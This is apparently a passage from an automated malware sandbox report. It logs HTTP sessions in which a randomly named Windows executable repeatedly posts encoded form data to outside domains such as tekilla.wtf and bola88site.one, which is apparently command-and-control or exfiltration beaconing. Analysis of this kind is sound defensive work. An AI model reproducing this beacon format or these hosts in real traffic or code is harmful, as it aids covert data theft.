              Data Raw: 48 30 51 50 36 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 74 35 6b 4f 45 51 6b 53 6c 41 57 76 66 4d 72 73 6a 74 36 5a 61 6c 53 57 6a 78 73 66 4b 52 68 67 74 45 58 57 46 44 2f 4e 58 50 56 4b 38 56 69 4d 77 3d
              Data Ascii: H0QP6=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWt5kOEQkSlAWvfMrsjt6ZalSWjxsfKRhgtEXWFD/NXPVK8ViMw=
              Sep 22, 2024 17:35:50.996587992 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:50 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.749717172.191.244.62805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:53.095289946 CEST1855OUTPOST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 71 6b 38 33 6b 79 67 67 58 79 64 41 35 6b 76 50 38 42 72 68 78 52 53 2b 7a 50 74 73 37 61 38 2b 47 74 53 47 62 72 67 6f 47 63 77 68 74 45 49 79 4a 76 34 4a 44 41 50 34 73 56 32 6f 53 37 47 68 61 59 68 77 34 61 44 53 4f 53 6f 44 4f 44 57 34 36 73 31 49 30 6d 52 4d 53 35 33 63 6a 69 33 63 67 62 46 34 57 43 36 69 67 4b 58 4c 59 76 4f 65 4f 30 56 59 58 75 36 30 53 75 57 67 2b 67 48 68 43 4f 2b 77 34 31 41 45 2b 2f 30 4a 64 6b 6d 75 7a 48 6e 67 31 57 69 74 7a 63 72 39 72 51 2f 7a 59 56 [TRUNCATED]
              Data Ascii: H0QP6=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcqk83kyggXydA5kvP8BrhxRS+zPts7a8+GtSGbrgoGcwhtEIyJv4JDAP4sV2oS7GhaYhw4aDSOSoDODW46s1I0mRMS53cji3cgbF4WC6igKXLYvOeO0VYXu60SuWg+gHhCO+w41AE+/0JdkmuzHng1Witzcr9rQ/zYVBNHBaOWphyr1CjjrfhMdNdOZtvLdPnxiIOCWifVdAS+9avR69PrpiP3og+/C3eOixHriMiJa3B6X2o/kF4IGxfq8kXTdxzKEUqeZW5QgKu50qdQOBKTIvXpWMNuj2XpfyLS8oWtStL7U+6D42sExOvRmGIw+Rzzk5F9T9rx/BrkZJ9+pN0wSvLp1vxjIsPzNDLcEZYIzXdwBSSxGF40lBfpr+VFmsCe810NmPtVUjJ1hQz01mzf6YyBY+61TmmiQSsszVkzXJDU2edWbplxRFGtSjk/5AGBNrvH6Y26M4FEbRXcC6gjwCw30gw90EUaD4pGW9A1ij3FRBJ4siYWJes28j9r8kXHlTCqQ9lFrCLJ8l0zvr7Q1sbsUhOL/T6OGU+yB9441u4mYGLp9jj1G6P8DqT1fUmdmF0xrg6QrY4fKZtfmf+O0xC2F0O1Rs91RA2lV3i/Qh1Chz1MvHpoUbbw40GzXTS6GxRbK+R+mxhVVFQB9UPyXN5zGIPQrPr7UPxblf7ChQXJ3Im5/+fVm58HSb/UcjMeBwehwHYTMPd3JaV5lLAqpib/+Zm8jqgxx0KigNcLfuSpoPGXSLc2ZkOkhjAB9ZA97wkDwnzB+/5UhQ/+4s9fAIe5HCFOXLdJo8D9Gwh58HNinYYD3BJEErBGQ9ojeiNpgmn [TRUNCATED]
              Sep 22, 2024 17:35:53.574250937 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:53 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.749718172.191.244.62805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:55.642049074 CEST562OUTGET /fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:35:56.119117975 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:56 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.749719172.96.191.39805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:01.526561975 CEST831OUTPOST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 59 52 51 59 55 77 50 69 65 4a 2b 36 55 53 66 51 79 70 69 67 67 4c 4b 41 4a 31 36 67 36 65 59 42 44 77 32 77 71 39 6d 72 68 55 55 73 57 59 45 73 77 3d 3d
              Data Ascii: H0QP6=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUYRQYUwPieJ+6USfQypiggLKAJ16g6eYBDw2wq9mrhUUsWYEsw==
              Sep 22, 2024 17:36:02.435503006 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:02 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.749720172.96.191.39805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:04.071688890 CEST851OUTPOST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 7a 78 45 4c 52 4d 33 63 44 74 44 43 30 75 39 49 4a 48 30 57 78 2b 68 45 35 41 36 45 50 47 37 4a 48 31 57 6e 52 72 6b 71 34 31 71 41 4c 4c 6c 64 41 3d
              Data Ascii: H0QP6=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xzxELRM3cDtDC0u9IJH0Wx+hE5A6EPG7JH1WnRrkq41qALLldA=
              Sep 22, 2024 17:36:04.981163025 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:04 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.749721172.96.191.39805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:06.617681980 CEST1864OUTPOST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 68 52 44 69 68 54 43 49 34 46 61 78 4f 58 65 4c 51 77 6c 77 4c 74 62 78 6e 39 37 6d 47 78 31 79 44 43 58 6e 36 62 4c 62 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6d 50 75 61 6e 6e 52 66 62 2f 67 71 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 6f 6c 77 [TRUNCATED]
              Data Ascii: H0QP6=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjfB9xlKLPhRDihTCI4FaxOXeLQwlwLtbxn97mGx1yDCXn6bLbWRJkPR6wzXRwoHMRAee0KKeXva9zSC0cD8Veyjn5MpLPbaRt4cZ94m+VjStLFzlmPuannRfb/gq9JW/LZIjekMCcQuZAH9jvXi30XJ+dYMimL8iXolwv+EOvZ+HWPrk4Zz418ft4p6SI4tZKOO0YAl6L/b5yTKqstQNd4buwdKddOELFA7FnNL8YY47F1XOEiu6hSjmlB9LiD/m90oepaWLGoweGfVXTzhiP6bt0jmPFRuLwVTj7B6CVguWnc3eYUzl+cu/m1++P0ZICnkO+LMy1LyOeZQnqxGV0OPG15G2erGr582illRHqrFjhsFHXXkke+UG4ZDFliJcVO5EOg4nLCG1C6DMljhOjRKP2sqL+7QIN/BfzCrOyvpF8Sv+i5IPTz8lD9ztUN+f35vrQpfpGxXPojt7gXegLlXw3odoPIADWonPBLzndFE27G+KTU8EHcRFhsdHcTK+kAcLh72vNjv2eykZJoZbsnf/mBb4FMNwW0T+3ySNgWVaSqcxEtFVLDRZaJtms4CVTwzwNJgQ8+ekoOcWYeRLzIMCvQl6DpaxNGQSzb4R8IVTm7vXbyQ/tno/SmbJDBudLejwq7PHsoYZQHNvd+mkzr3kZLLd7Xvdytl6vXxPWFc47AfMb65bNqO3YKkGN7Di3e9VoNKEu/NsRnMSf5nKk3IsaQo0vG8PZSgbZVb9fL8JxP3CfjnI7tYV5hY6E7MaOfOLjwzt2JoaZyr9TvWF2s3zXSelZpq//11lkRnHk9a6y+5bhwuQxTEiUicAt4909wc5Lq [TRUNCATED]
              Sep 22, 2024 17:36:07.506680965 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:07 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.749722172.96.191.39805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:09.160659075 CEST565OUTGET /3qit/?H0QP6=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:36:10.054687023 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:09 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.749723217.70.184.50805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:15.159785032 CEST840OUTPOST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
